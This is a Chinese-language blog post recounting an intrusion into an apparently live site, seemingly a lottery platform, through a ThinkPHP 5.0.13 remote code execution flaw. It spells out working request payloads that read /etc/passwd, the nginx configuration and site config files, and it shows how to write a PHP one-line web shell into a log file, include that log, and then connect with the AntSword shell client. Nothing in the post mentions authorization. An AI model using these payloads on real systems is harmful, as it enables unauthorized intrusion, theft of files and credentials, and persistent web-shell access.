一次曲折的TP

约定不等于承诺〃 2023-01-01 07:59 194阅读 0赞

还是老规矩，进来直接用exp将phpinfo打出来（tp的版本为5.0.13）  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70]  
但是我们用常规的日志包含，却找不到我们的日志在哪里.后面才知道，我们get去请求也是无法请求到的，因为日志不在网站的绝对路径，只能通过post去fuzzing日志  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 1]  
此时用session去包含，不行，因为session过期过的很快，所以一直拿不下来，后面问了公司的表哥才知道，这种情况可以用session的文件竞争来绕过，将其拿下。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 2]  
其他常规的exp，file\_put\_content wget这些，都是打不进去的，这个时候我们就可以看看常规的文件能不能读取  
\_method=\_\_construct&method=get&filter\[\]=highlight\_file&method=GET&get\[\]=/etc/pass  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 3]  
然后我想的就是用payload罗列出目录，查找我们的日志在哪儿,但是当我想要罗列的时候，我觉得应该是运维设置盘符设置的有问题吧，全tm是null，就只有一个一个fuzzing  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 4]  
根据其爆的phpinfo的信息，还有tp手册写的日志，我们成功fuzzing到一个比较重要的目录，就是日志的目录,此外，该站的话，没有登录是无法访问日志信息的  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 5]  
我们可以通过都这里，然后在配合其debug信息，成功找到日志的位置，对了，再给表哥们补充几个tp其他敏感位置的文件  
\_method=\_\_construct&method=get&filter\[\]=think\_include\_file&server\[\]=phpinfo&get\[\]=/etc/passwd  
\_method=\_\_construct&method=get&filter\[\]=show\_source&method=GET&get\[\]=/etc/nginx/nginx.conf  
\_method=\_\_construct&filter\[\]=highlight\_file&method=GET&get\[\]=/data/app/lottery/application/config/site.php  
最后，我们通过Post传参成功的读取到了日志，但是我们get的话，确是非授权的。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 6]  
先用exp报错，我们把一句话写进去，然后再用exp去看看我们写进去没有。  
\_method=\_\_construct&method=get&filter\[\]=call\_user\_func&server\[\]=phpinfo&get\[\]=<?php eval($\_POST\['x'\])?>  
\_method=\_\_construct&method=get&filter\[\]=think\_\_include\_file&get\[\]=/data/appdata/lottery/log/agentapi/202012/30.log&x=phpinfo();  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 7]  
成功包含，直接蚁剑链接拿下  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 8]  
图片不清楚，可以去我的cnblogs看，因为大部分csdn的文章都是从哪里粘贴复制过来的。。。。。。  
https://www.cnblogs.com/xinxin999/p/14220165.html

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70]: /images/20221120/5b0d1e4abf0b4d809cf62b78eb81f6c9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 1]: /images/20221120/d4fc47838ab8438ca9e4e252e45479dd.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 2]: /images/20221120/8a6cb1e19b944176a510208aa87d805b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 3]: /images/20221120/283ac3c0009442ec8df88db539f89efc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 4]: /images/20221120/ddab0655f3d947aa8de39c2036feb57d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 5]: /images/20221120/45b97bd71d4b45e3879ce1894848aae1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 6]: /images/20221120/981d39506dc34843b07c0a849c1f2869.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 7]: /images/20221120/46a7b37fb60242b0b48264550026b0bf.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzU3MDY0OA_size_16_color_FFFFFF_t_70 8]: /images/20221120/52f63a253525482c88e4db21d969ed08.png